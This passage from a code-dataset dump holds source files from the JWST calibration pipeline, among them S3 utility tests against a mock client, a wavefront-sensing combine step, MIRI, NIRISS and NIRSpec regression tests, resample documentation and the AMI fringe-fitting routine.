dist.meta.instrument.name = \"NIRCAM\"\n dist.meta.instrument.detector = \"NRCA1\"\n 
dist.meta.instrument.p_pupil = \"F162M|F164N|CLEAR|\"\n    dist.meta.instrument.pupil = \"F162M\"\n    dist.meta.exposure.p_exptype = \"NRC_IMAGE|NRC_TSIMAGE|NRC_FLAT|NRC_LED|NRC_WFSC|\"\n    dist.meta.exposure.type = \"NRC_IMAGE\"\n    dist.meta.psubarray = \"FULL|SUB64P|SUB160|SUB160P|SUB320|SUB400P|SUB640|\"\n    dist.meta.subarray.name = \"FULL\"\n    path = str(tmpdir.join(\"test_dist.asdf\"))\n    dist.save(path)\n\n    with DistortionModel(path) as dist1:\n        assert dist1.meta.instrument.p_pupil == dist.meta.instrument.p_pupil\n        assert dist1.meta.instrument.pupil == dist.meta.instrument.pupil\n        assert dist1.meta.exposure.p_exptype == dist.meta.exposure.p_exptype\n        assert dist1.meta.exposure.type == dist.meta.exposure.type\n        assert dist1.meta.psubarray == dist.meta.psubarray\n        assert dist1.meta.subarray.name == dist.meta.subarray.name\n" }, { "alpha_fraction": 0.6454464793205261, "alphanum_fraction": 0.6781609058380127, "avg_line_length": 29.567567825317383, "blob_id": "d68e768f006b179fab18b07e2658655f615f986a", "content_id": "cb2dee0d42488a297fe69a8fc78b4e7d9871bea2", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1131, "license_type": "permissive", "max_line_length": 105, "num_lines": 37, "path": "/jwst/lib/tests/test_s3_utils.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.lib import s3_utils\nfrom . import helpers\n\n\n@pytest.fixture\ndef s3_text_file(s3_root_dir):\n    path = str(s3_root_dir.join(\"test.txt\"))\n    with open(path, \"w\") as text_file:\n        print(\"foo\", file=text_file)\n\n    return path\n\n\ndef test_object_exists(s3_text_file):\n    assert s3_utils.object_exists(\"s3://test-s3-data/test.txt\") is True\n    assert s3_utils.object_exists(\"s3://test-s3-data/missing.fits\") is False\n    assert s3_utils.object_exists(\"s3://missing-bucket/test.txt\") is False\n\n\ndef test_get_object(s3_text_file):\n    assert s3_utils.get_object(\"s3://test-s3-data/test.txt\").read() == b\"foo\\n\"\n\n\ndef test_get_client(s3_text_file):\n    assert isinstance(s3_utils.get_client(), helpers.MockS3Client)\n\n\ndef test_is_s3_uri(s3_text_file):\n    assert s3_utils.is_s3_uri(\"s3://test-s3-data/test.fits\") is True\n    assert s3_utils.is_s3_uri(\"some/filesystem/path\") is False\n\n\ndef test_split_uri(s3_text_file):\n    assert s3_utils.split_uri(\"s3://test-s3-data/key\") == (\"test-s3-data\", \"key\")\n    assert s3_utils.split_uri(\"s3://test-s3-data/some/longer/key\") == (\"test-s3-data\", \"some/longer/key\")\n" }, { "alpha_fraction": 0.5601123571395874, "alphanum_fraction": 0.5640449523925781, "avg_line_length": 28.66666603088379, "blob_id": "ec6d49d2c6c438e81c6cd5df4ff9aa143cf722a5", "content_id": "053063c916f3c4141ab07875b446b66e46da2a2d", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1780, "license_type": "permissive", "max_line_length": 80, "num_lines": 60, "path": "/jwst/wfs_combine/wfs_combine_step.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\nimport os.path as op\n\nfrom ..stpipe import Step\nfrom . 
import wfs_combine\n\n__all__ = [\"WfsCombineStep\"]\n\n\nclass WfsCombineStep(Step):\n\n \"\"\"\n This step combines pairs of dithered PSF images\n \"\"\"\n\n spec = \"\"\"\n do_refine = boolean(default=False)\n \"\"\"\n\n def process(self, input_table):\n\n # Load the input ASN table\n asn_table = self.load_as_level3_asn(input_table)\n num_sets = len(asn_table['products'])\n\n self.log.info('Using input table: %s', input_table)\n self.log.info('The number of pairs of input files: %g', num_sets)\n\n # Process each pair of input images listed in the association table\n for which_set in asn_table['products']:\n\n # Get the list of science members in this pair\n science_members = [\n member\n for member in which_set['members']\n if member['exptype'].lower() == 'science'\n ]\n infile_1 = science_members[0]['expname']\n infile_2 = science_members[1]['expname']\n outfile = which_set['name']\n\n # Create the step instance\n wfs = wfs_combine.DataSet(\n infile_1, infile_2, outfile, self.do_refine\n )\n\n # Do the processing\n output_model = wfs.do_all()\n\n # Update necessary meta info in the output\n output_model.meta.cal_step.wfs_combine = 'COMPLETE'\n output_model.meta.asn.pool_name = asn_table['asn_pool']\n output_model.meta.asn.table_name = op.basename(input_table)\n\n # Save the output file\n self.save_model(\n output_model, suffix='wfscmb', output_file=outfile, format=False\n )\n\n return None\n" }, { "alpha_fraction": 0.6483516693115234, "alphanum_fraction": 0.6675823926925659, "avg_line_length": 25, "blob_id": "74b535d99605443e4e340b9ecb1f1b14620f5954", "content_id": "3ca94848f885704760e323a4db1908e7c7a0af0c", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 364, "license_type": "permissive", "max_line_length": 80, "num_lines": 14, "path": "/jwst/datamodels/extract1dimage.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "from .model_base import DataModel\n\n__all__ = ['Extract1dImageModel']\n\nclass Extract1dImageModel(DataModel):\n \"\"\"\n A data model for the extract_1d reference image array.\n\n Parameters\n __________\n data : numpy float32 array\n 1-D extraction regions array\n \"\"\"\n schema_url = \"http://stsci.edu/schemas/jwst_datamodel/extract1dimage.schema\"\n" }, { "alpha_fraction": 0.4483985900878906, "alphanum_fraction": 0.4804270565509796, "avg_line_length": 19.071428298950195, "blob_id": "6c7f166ee09613c5739fc35ea8a80c83f463d97a", "content_id": "a76a6f13bd37324ddce3d87d3d37c66e9f4e83eb", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 281, "license_type": "permissive", "max_line_length": 48, "num_lines": 14, "path": "/jwst/datamodels/tests/test_storage.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom .. 
import util\n\n\ndef test_gentle_asarray():\n x = np.array([('abc', 1.0)], dtype=[\n ('FOO', 'S3'),\n ('BAR', '>f8')])\n\n new_dtype = [('foo', '|S3'), ('bar', '<f8')]\n\n y = util.gentle_asarray(x, new_dtype)\n\n assert y['BAR'][0] == 1.0\n" }, { "alpha_fraction": 0.4202929735183716, "alphanum_fraction": 0.4947580099105835, "avg_line_length": 50.57777786254883, "blob_id": "d29d9d0edaa2463d72696e3e8fa8178983fcca0c", "content_id": "ff2de8bead5087ad7dad29a4ca5f0776b0029fb0", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13926, "license_type": "permissive", "max_line_length": 93, "num_lines": 270, "path": "/jwst/tests_nightly/general/miri/test_miri_steps.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.tests.base_classes import BaseJWSTTestSteps\nfrom jwst.tests.base_classes import pytest_generate_tests # noqa: F401\n\nfrom jwst.refpix import RefPixStep\nfrom jwst.dark_current import DarkCurrentStep\nfrom jwst.dq_init import DQInitStep\nfrom jwst.extract_1d import Extract1dStep\nfrom jwst.flatfield import FlatFieldStep\nfrom jwst.fringe import FringeStep\nfrom jwst.jump import JumpStep\nfrom jwst.lastframe import LastFrameStep\nfrom jwst.linearity import LinearityStep\nfrom jwst.photom import PhotomStep\nfrom jwst.rscd import RSCD_Step\nfrom jwst.saturation import SaturationStep\nfrom jwst.srctype import SourceTypeStep\nfrom jwst.straylight import StraylightStep\n\n# Parameterized regression tests for MIRI processing\n# All tests in this set run with 1 input file and\n# only generate 1 output for comparison.\n#\[email protected]\nclass TestMIRISteps(BaseJWSTTestSteps):\n input_loc = 'miri'\n\n params = {'test_steps':\n [\n # test_refpix_miri: refpix step performed on MIRI data\n dict(input='jw00001001001_01101_00001_MIRIMAGE_saturation.fits',\n test_dir='test_bias_drift',\n step_class=RefPixStep,\n step_pars=dict(use_side_ref_pixels=False,\n side_smoothing_length=10,\n side_gain=1.0),\n output_truth='jw00001001001_01101_00001_MIRIMAGE_bias_drift.fits',\n output_hdus=[],\n id='refpix_miri'\n ),\n # test_refpix_miri2: refpix step performed on MIRI data\n dict(input='jw00025001001_01107_00001_MIRIMAGE_saturation.fits',\n test_dir='test_bias_drift',\n step_class=RefPixStep,\n step_pars=dict(use_side_ref_pixels=False,\n side_smoothing_length=10,\n side_gain=1.0),\n output_truth='jw00025001001_01107_00001_MIRIMAGE_bias_drift.fits',\n output_hdus=[],\n id='refpix_miri2'\n ),\n # test_dark_current_miri: dark current step performed on MIRI data\n dict(input='jw00001001001_01101_00001_MIRIMAGE_bias_drift.fits',\n test_dir='test_dark_step',\n step_class=DarkCurrentStep,\n step_pars=dict(),\n output_truth='jw00001001001_01101_00001_MIRIMAGE_dark_current.fits',\n output_hdus=[],\n id='dark_current_miri'\n ),\n # test_dark_current_miri2: dark current step performed on MIRI data\n dict(input='jw80600012001_02101_00003_mirimage_lastframe.fits',\n test_dir='test_dark_step',\n step_class=DarkCurrentStep,\n step_pars=dict(),\n output_truth='jw80600012001_02101_00003_mirimage_dark.fits',\n output_hdus=[],\n id='dark_current_miri2'\n ),\n # test_dq_init_miri: dq_init step performed on uncalibrated MIRI data\n dict(input='jw00001001001_01101_00001_MIRIMAGE_uncal.fits',\n test_dir='test_dq_init',\n step_class=DQInitStep,\n step_pars=dict(),\n output_truth='jw00001001001_01101_00001_MIRIMAGE_dq_init.fits',\n output_hdus=[],\n id='dq_init_miri'\n ),\n # test_dq_init_miri2: dq_init step performed 
on uncalibrated MIRI data\n dict(input='jw80600012001_02101_00003_mirimage_uncal.fits',\n test_dir='test_dq_init',\n step_class=DQInitStep,\n step_pars=dict(),\n output_truth='jw80600012001_02101_00003_mirimage_dqinit.fits',\n output_hdus=[],\n id='dq_init_miri2'\n ),\n # test_extract1d_miri: extract_1d step performed on MIRI LRS fixed-slit data\n dict(input='jw00035001001_01101_00001_mirimage_photom.fits',\n test_dir='test_extract1d',\n step_class=Extract1dStep,\n step_pars=dict(suffix='x1d'),\n output_truth='jw00035001001_01101_00001_mirimage_x1d.fits',\n output_hdus=[],\n id='extract1d_miri'\n ),\n # test_extract1d_miri2: extract_1d step performed on MIRI LRS slitless data\n dict(input='jw80600012001_02101_00003_mirimage_photom.fits',\n test_dir='test_extract1d',\n step_class=Extract1dStep,\n step_pars=dict(suffix='x1d'),\n output_truth='jw80600012001_02101_00003_mirimage_x1d.fits',\n output_hdus=[],\n id='extract1d_miri2'\n ),\n # test_flat_field_miri: flat_field step performed on MIRI data.\n dict(input='jw00001001001_01101_00001_MIRIMAGE_assign_wcs.fits',\n test_dir='test_flat_field',\n step_class=FlatFieldStep,\n step_pars=dict(),\n output_truth='jw00001001001_01101_00001_MIRIMAGE_flat_field.fits',\n output_hdus=[],\n id='flat_field_miri'\n ),\n # test_flat_field_miri2: flat_field step performed on MIRI data.\n dict(input='jw80600012001_02101_00003_mirimage_assign_wcs.fits',\n test_dir='test_flat_field',\n step_class=FlatFieldStep,\n step_pars=dict(),\n output_truth='jw80600012001_02101_00003_mirimage_flat_field.fits',\n output_hdus=[],\n id='flat_field_miri2'\n ),\n # test_fringe_miri: fringe performed on MIRI data.\n dict(input='fringe1_input.fits',\n test_dir='test_fringe',\n step_class=FringeStep,\n step_pars=dict(),\n output_truth='baseline_fringe1.fits',\n output_hdus=['primary','sci','err','dq'],\n id='fringe_miri'\n ),\n # test_fringe_miri2: fringe performed on MIRI data.\n dict(input='fringe2_input.fits',\n test_dir='test_fringe',\n step_class=FringeStep,\n step_pars=dict(),\n output_truth='baseline_fringe2.fits',\n output_hdus=['primary','sci','err','dq'],\n id='fringe_miri2'\n ),\n # test_fringe_miri3: fringe performed on MIRI data.\n dict(input='fringe3_input.fits',\n test_dir='test_fringe',\n step_class=FringeStep,\n step_pars=dict(),\n output_truth='baseline_fringe3.fits',\n output_hdus=['primary','sci','err','dq'],\n id='fringe_miri3'\n ),\n # test_jump_miri: jump step performed on MIRI data.\n dict(input='jw00001001001_01101_00001_MIRIMAGE_linearity.fits',\n test_dir='test_jump',\n step_class=JumpStep,\n step_pars=dict(rejection_threshold=200.0),\n output_truth='jw00001001001_01101_00001_MIRIMAGE_jump.fits',\n output_hdus=[],\n id='jump_miri'\n ),\n # test_jump_miri2: jump step performed on MIRI data.\n dict(input='jw80600012001_02101_00003_mirimage_dark.fits',\n test_dir='test_jump',\n step_class=JumpStep,\n step_pars=dict(rejection_threshold=25.0),\n output_truth='jw80600012001_02101_00003_mirimage_jump.fits',\n output_hdus=[],\n id='jump_miri2'\n ),\n # test_lastframe_miri2: lastframe step performed on MIRI data\n dict(input='jw80600012001_02101_00003_mirimage_rscd.fits',\n test_dir='test_lastframe',\n step_class=LastFrameStep,\n step_pars=dict(),\n output_truth='jw80600012001_02101_00003_mirimage_lastframe.fits',\n output_hdus=[],\n id='lastframe_miri2'\n ),\n # test_linearity_miri: linearity step performed on MIRI data\n dict(input='jw00001001001_01101_00001_MIRIMAGE_dark_current.fits',\n test_dir='test_linearity',\n step_class=LinearityStep,\n 
step_pars=dict(),\n output_truth='jw00001001001_01101_00001_MIRIMAGE_linearity.fits',\n output_hdus=[],\n id='linearity_miri'\n ),\n # test_linearity_miri2: linearity step performed on MIRI data\n dict(input='jw80600012001_02101_00003_mirimage_saturation.fits',\n test_dir='test_linearity',\n step_class=LinearityStep,\n step_pars=dict(),\n output_truth='jw80600012001_02101_00003_mirimage_linearity.fits',\n output_hdus=[],\n id='linearity_miri2'\n ),\n # test_photom_miri: photom step performed on MIRI imaging data\n dict(input='jw00001001001_01101_00001_MIRIMAGE_emission.fits',\n test_dir='test_photom',\n step_class=PhotomStep,\n step_pars=dict(),\n output_truth='jw00001001001_01101_00001_MIRIMAGE_photom.fits',\n output_hdus=[],\n id='photom_miri'\n ),\n # test_photom_miri2: photom step performed on MIRI LRS slitless data\n dict(input='jw80600012001_02101_00003_mirimage_srctype.fits',\n test_dir='test_photom',\n step_class=PhotomStep,\n step_pars=dict(),\n output_truth='jw80600012001_02101_00003_mirimage_photom.fits',\n output_hdus=[],\n id='photom_miri2'\n ),\n # test_rscd_miri2: RSCD step performed on MIRI data\n dict(input='jw80600012001_02101_00003_mirimage_linearity.fits',\n test_dir='test_rscd',\n step_class=RSCD_Step,\n step_pars=dict(),\n output_truth='jw80600012001_02101_00003_mirimage_rscd.fits',\n output_hdus=[],\n id='rscd_miri'\n ),\n # test_saturation_miri: saturation step performed on uncalibrated MIRI data\n dict(input='jw00001001001_01101_00001_MIRIMAGE_dq_init.fits',\n test_dir='test_saturation',\n step_class=SaturationStep,\n step_pars=dict(),\n output_truth='jw00001001001_01101_00001_MIRIMAGE_saturation.fits',\n output_hdus=['primary','sci','err','pixeldq','groupdq'],\n id='saturation_miri'\n ),\n # test_saturation_miri2: saturation step performed on uncalibrated MIRI data\n dict(input='jw80600012001_02101_00003_mirimage_dqinit.fits',\n test_dir='test_saturation',\n step_class=SaturationStep,\n step_pars=dict(),\n output_truth='jw80600012001_02101_00003_mirimage_saturation.fits',\n output_hdus=[],\n id='saturation_miri2'\n ),\n # test_srctype2: srctype step performed on MIRI LRS slitless data\n dict(input='jw80600012001_02101_00003_mirimage_flat_field.fits',\n test_dir='test_srctype',\n step_class=SourceTypeStep,\n step_pars=dict(),\n output_truth='jw80600012001_02101_00003_mirimage_srctype.fits',\n output_hdus=[],\n id='srctype_miri'\n ),\n # test_straylight1_miri: straylight performed on MIRI IFUSHORT data\n dict(input='jw80500018001_02101_00002_MIRIFUSHORT_flatfield.fits',\n test_dir='test_straylight',\n step_class=StraylightStep,\n step_pars=dict(),\n output_truth='jw80500018001_02101_00002_MIRIFUSHORT_straylight.fits',\n output_hdus=['primary','sci','err','dq'],\n id='straylight_miri'\n ),\n # test_straylight2_miri: straylight performed on MIRI IFULONG data\n dict(input='jw80500018001_02101_00002_MIRIFULONG_flatfield.fits',\n test_dir='test_straylight',\n step_class=StraylightStep,\n step_pars=dict(),\n output_truth='jw80500018001_02101_00002_MIRIFULONG_straylight.fits',\n output_hdus=[],\n id='straylight_miri2'\n ),\n ]\n }\n" }, { "alpha_fraction": 0.5092307925224304, "alphanum_fraction": 0.6084615588188171, "avg_line_length": 35.11111068725586, "blob_id": "0ae6d3888016f4f9d7ceea58abf2caaab79fc61b", "content_id": "e8a78c9886fd4b582cc870cc23e71081be34daff", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1300, "license_type": "permissive", "max_line_length": 82, "num_lines": 36, "path": 
"/jwst/tests_nightly/general/niriss/test_tso3.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\nfrom jwst.pipeline import Tso3Pipeline\n\nfrom jwst.tests.base_classes import BaseJWSTTest, raw_from_asn\n\n\[email protected]\nclass TestTso3Pipeline(BaseJWSTTest):\n input_loc = 'niriss'\n ref_loc = ['test_caltso3', 'truth']\n test_dir = 'test_caltso3'\n\n def test_tso3_pipeline_nis(self):\n \"\"\"Regression test of calwebb_tso3 on NIRISS SOSS simulated data.\n \"\"\"\n asn_file = self.get_data(self.test_dir,\n \"jw87600-a3001_20170527t111213_tso3_001_asn.json\")\n for file in raw_from_asn(asn_file):\n self.get_data(self.test_dir, file)\n\n Tso3Pipeline.call(asn_file)\n\n outputs = [\n # Compare level-2c product\n ('jw87600024001_02101_00001_nis_a3001_crfints.fits',\n 'jw87600-a3001_t1_niriss_clear-gr700xd_crfints_ref.fits',\n ['primary', 'sci', 'dq', 'err']),\n\n # Compare level-3 product\n ('jw87600-a3001_t1_niriss_clear-gr700xd_x1dints.fits',\n 'jw87600-a3001_t1_niriss_clear-gr700xd_x1dints_ref.fits',\n ['primary', 'extract1d']),\n ('jw87600-a3001_t1_niriss_clear-gr700xd_whtlt.ecsv',\n 'jw87600-a3001_t1_niriss_clear-gr700xd_whtlt_ref.ecsv'),\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.517241358757019, "alphanum_fraction": 0.5400679707527161, "avg_line_length": 35.76785659790039, "blob_id": "613ed22c4a819eadb40c1ed74bad817f36d658ac", "content_id": "5f7198e307c9f663f9282d92dfdacc2f27872775", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2059, "license_type": "permissive", "max_line_length": 65, "num_lines": 56, "path": "/jwst/tests_nightly/general/miri/test_mrs_spec3.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\nfrom jwst.pipeline.calwebb_spec3 import Spec3Pipeline\n\nfrom jwst.tests.base_classes import BaseJWSTTest, raw_from_asn\n\n\[email protected]\nclass TestSpec3Pipeline(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['mrs_calspec3', 'truth']\n test_dir = 'mrs_calspec3'\n rtol = 0.000001\n\n def test_spec3_pipeline1(self):\n \"\"\"\n Regression test of calwebb_spec3 pipeline on simulated\n MIRI MRS dithered data.\n \"\"\"\n\n asn_file = self.get_data(self.test_dir, 'test_asn4.json')\n for file in raw_from_asn(asn_file):\n self.get_data(self.test_dir, file)\n\n step = Spec3Pipeline()\n step.save_bsub = False\n step.mrs_imatch.suffix = 'mrs_imatch'\n step.mrs_imatch.bkg_degree = 1\n step.mrs_imatch.subtract = False\n step.outlier_detection.skip = True\n step.output_use_model = True\n step.resample_spec.save_results = True\n step.resample_spec.suffix = 's2d'\n step.cube_build.save_results = True\n step.cube_build.suffix = 's3d'\n step.extract_1d.save_results = True\n step.extract_1d.suffix = 'x1d'\n step.run(asn_file)\n\n outputs = [(# Compare cube product 1\n 'det_image_ch1-short_s3d.fits',\n 'det_image_ch1-short_s3d_ref.fits',\n ['primary', 'sci', 'err', 'dq', 'wmap']),\n (# Compare cube product 2\n 'det_image_ch2-short_s3d.fits',\n 'det_image_ch2-short_s3d_ref.fits',\n ['primary', 'sci', 'err', 'dq', 'wmap']),\n (# Compare x1d product 1\n 'det_image_ch1-short_x1d.fits',\n 'det_image_ch1-short_x1d_ref.fits',\n ['primary', 'extract1d']),\n (# Compare x1d product 2\n 'det_image_ch2-short_x1d.fits',\n 'det_image_ch2-short_x1d_ref.fits',\n ['primary', 'extract1d'])\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.7299465537071228, "alphanum_fraction": 0.7379679083824158, "avg_line_length": 22.375, "blob_id": 
"a6fd43cb82b8d9a88332056d7447527a50e88168", "content_id": "83125e8be0cd9770259f3f7106f1b17713597aea", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 374, "license_type": "permissive", "max_line_length": 57, "num_lines": 16, "path": "/jwst/pipeline/tests/test_calwebspec2.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom ..calwebb_spec2 import Spec2Pipeline\n\n\[email protected](scope='module')\ndef fake_pipeline():\n return Spec2Pipeline()\n\n\ndef test_filenotfounderror_raised(fake_pipeline, capsys):\n with pytest.raises(RuntimeError):\n fake_pipeline.run('file_does_not_extis.fits')\n\n captured = capsys.readouterr()\n assert 'FileNotFoundError' in captured.err\n" }, { "alpha_fraction": 0.72775799036026, "alphanum_fraction": 0.7313167452812195, "avg_line_length": 35.25806427001953, "blob_id": "6f2185950e4434384dfd41a4bce06325a2fafd59", "content_id": "2007d773539c6efb01fb0b8e7df8b6d8c9e546d8", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1124, "license_type": "permissive", "max_line_length": 73, "num_lines": 31, "path": "/docs/jwst/resample/arguments.rst", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": ".. _resample_step_args:\n\nStep Arguments\n==============\nThe `resample` step has the following optional arguments that control\nthe behavior of the processing and the characteristics of the resampled\nimage.\n\n``--pixfrac`` (float, default=1.0)\n The fraction by which input pixels are \"shrunk\" before being drizzled\n onto the output image grid, given as a real number between 0 and 1.\n\n``--kernel`` (str, default='square')\n The form of the kernel function used to distribute flux onto the output\n image.\n\n``--fillval`` (str, default='INDEF')\n The value to assign to output pixels that have zero weight or do not\n receive any flux from any input pixels during drizzling.\n\n``--weight_type`` (str, default='exptime')\n The weighting factor for each input image. If `weight_type=exptime`,\n the scaling value will be set equal to the exposure time found in\n the image header.\n\n``--single`` (bool, default=False)\n Resample each input image into a separate output.\n\n``--blendheaders`` (bool, default=True)\n Apply `blendmodels` on all of the input images to combine ('blend')\n their meta data into the output resampled image.\n" }, { "alpha_fraction": 0.6449480652809143, "alphanum_fraction": 0.6635977625846863, "avg_line_length": 32.88800048828125, "blob_id": "569c894fb000cc351de4b6dde905d3339e7bd5e5", "content_id": "4ed5cee95a32ddcadaf36a49b29de730f4113449", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4236, "license_type": "permissive", "max_line_length": 89, "num_lines": 125, "path": "/jwst/ami/ami_analyze.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "#\n# Module for applying the LG algorithm to an AMI exposure\n#\n\nimport logging\nimport warnings\nimport numpy as np\nfrom .. import datamodels\n\nfrom .nrm_model import NrmModel\nfrom . import webb_psf\nfrom . import leastsqnrm\nfrom . 
import utils\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\n\ndef apply_LG(input_model, filter_model, oversample, rotation):\n    \"\"\"\n    Short Summary\n    -------------\n    Applies the LG fringe detection algorithm to an AMI image\n\n    Parameters\n    ----------\n    input_model: data model object\n        AMI science image to be analyzed\n\n    filter_model: filter model object\n        filter throughput reference data\n\n    oversample: integer\n        Oversampling factor\n\n    rotation: float (degrees)\n        Initial guess at rotation of science image relative to model\n\n    Returns\n    -------\n    output_model: Fringe model object\n        Fringe analysis data\n    \"\"\"\n    # Suppress harmless arithmetic warnings for now\n    warnings.filterwarnings(\"ignore\", \".*invalid value.*\", RuntimeWarning)\n    warnings.filterwarnings(\"ignore\", \".*divide by zero.*\", RuntimeWarning)\n\n    # Report the FILTER value for this image\n    log.info('Filter: %s', input_model.meta.instrument.filter)\n\n    # Load the filter throughput data from the reference file\n    bindown = 12\n    band = webb_psf.get_webbpsf_filter(filter_model, specbin=bindown)\n\n    # Set up some params that are needed as input to the LG algorithm:\n    # Search window for rotation fine-tuning\n    rots_deg = np.array((-1.00, -0.5, 0.0, 0.5, 1.00))\n\n    # Search range for relative pixel scales\n    relpixscales = np.array((64.2, 64.4, 64.6, 64.8, 65.0, 65.2, 65.4, 65.6, 65.8)) / 65.0\n\n    # Convert initial rotation guess from degrees to radians\n    rotation = rotation * np.pi / 180.0\n\n    # Instantiate the NRM model object\n    jwnrm = NrmModel(mask='jwst', holeshape='hex',\n                     pixscale=leastsqnrm.mas2rad(65.),\n                     rotate=rotation, rotlist_deg=rots_deg,\n                     scallist=relpixscales)\n\n    # Load the filter bandpass data into the NRM model\n    jwnrm.bandpass = band\n    # Set the oversampling factor in the NRM model\n    jwnrm.over = oversample\n\n    # Now fit the data in the science exposure\n    # (pixguess is a guess at the pixel scale of the data)\n    # produces a 19x19 image of the fit\n    input_data = input_model.data.astype(np.float64)\n    input_dq = input_model.dq\n\n    datamodel_img_model = datamodels.ImageModel(data=input_data, dq=input_dq)\n    box_size = 4\n\n    new_img_model = utils.img_median_replace(datamodel_img_model, box_size)\n\n    input_data = new_img_model.data.copy()\n    input_model.data = input_data.astype(np.float64)\n\n    del datamodel_img_model, new_img_model\n\n    subarray = input_model.meta.subarray.name.upper()\n    if subarray == 'FULL':\n        # Instead of using the FULL subarray, extract the same region (size and\n        # location) as used by SUB80 to make execution time acceptable\n        xstart = 1045 # / Starting pixel in axis 1 direction\n        ystart = 1 # / Starting pixel in axis 2 direction\n        xsize = 80 # / Number of pixels in axis 1 direction\n        ysize = 80 # / Number of pixels in axis 2 direction\n        xstop = xstart + xsize - 1\n        ystop = ystart + ysize - 1\n\n        jwnrm.fit_image(input_data[ystart-1:ystop, xstart-1:xstop], pixguess=jwnrm.pixel)\n    else:\n        jwnrm.fit_image(input_data, pixguess=jwnrm.pixel)\n\n    # Construct model image from fitted PSF\n    jwnrm.create_modelpsf()\n\n    # Reset the warnings filter to its original state\n    warnings.resetwarnings()\n\n    # Store fit results in output model\n    output_model = datamodels.AmiLgModel(fit_image=jwnrm.modelpsf,\n                                         resid_image=jwnrm.residual,\n                                         closure_amp_table=np.asarray(jwnrm.redundant_cas),\n                                         closure_phase_table=np.asarray(jwnrm.redundant_cps),\n                                         fringe_amp_table=np.asarray(jwnrm.fringeamp),\n                                         fringe_phase_table=np.asarray(jwnrm.fringephase),\n                                         pupil_phase_table=np.asarray(jwnrm.piston),\n                                         
solns_table=np.asarray(jwnrm.soln))\n\n # Copy header keywords from input to output\n output_model.update(input_model)\n\n return output_model\n" }, { "alpha_fraction": 0.5778816342353821, "alphanum_fraction": 0.59112149477005, "avg_line_length": 27.53333282470703, "blob_id": "42ad9d1559713b78b5388ffd2839c684e3d0433f", "content_id": "f4dbb6db7befd99b80a8327894275e9392d1f759", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1284, "license_type": "permissive", "max_line_length": 69, "num_lines": 45, "path": "/jwst/tests_nightly/general/nirspec/test_nirspec_msa_spec3.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"Test calwebb_spec3 against NIRSpec MOS science (MSA)\"\"\"\nfrom pathlib import Path\nimport pytest\n\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.stpipe import Step\n\nfrom jwst.tests.base_classes import BaseJWSTTest, raw_from_asn\n\n\[email protected]\nclass TestSpec3Pipeline(BaseJWSTTest):\n \"\"\"Tests for Spec3Pipeline\"\"\"\n\n input_loc = 'nirspec'\n ref_loc = ['test_datasets', 'msa', 'sdp_jw95175', 'truth']\n test_dir = ['test_datasets', 'msa', 'sdp_jw95175']\n\n def test_nrs_msa_spec3(self):\n \"\"\"\n Regression test of calwebb_spec3 pipeline performed on\n NIRSpec MSA data\n \"\"\"\n cfg_dir = './cfgs'\n collect_pipeline_cfgs(cfg_dir)\n asn_file = self.get_data(*self.test_dir,\n 'single_asn.json')\n\n for file in raw_from_asn(asn_file):\n self.get_data(*self.test_dir, file)\n\n args = [\n str(Path(cfg_dir) / 'calwebb_spec3.cfg'),\n asn_file\n ]\n\n Step.from_cmdline(args)\n\n # Compare results\n truths = self.data_glob(*self.ref_loc, glob='*.fits')\n outputs = [\n (Path(output_file).name, ) * 2\n for output_file in truths\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.5208883285522461, "alphanum_fraction": 0.6035619974136353, "avg_line_length": 38.894737243652344, "blob_id": "d129fec2ef2e705a75f72606336f44979fe47723", "content_id": "67d26777c75cc98ed272643197b5a377b3cefb17", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4548, "license_type": "permissive", "max_line_length": 88, "num_lines": 114, "path": "/jwst/tests_nightly/general/nirspec/test_pipelines.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.stpipe import Step\nfrom jwst.pipeline import DarkPipeline\nfrom jwst.pipeline import Spec2Pipeline\n\nfrom jwst.tests.base_classes import BaseJWSTTest\n\n\[email protected]\nclass TestNIRSpecPipelines(BaseJWSTTest):\n input_loc = 'nirspec'\n 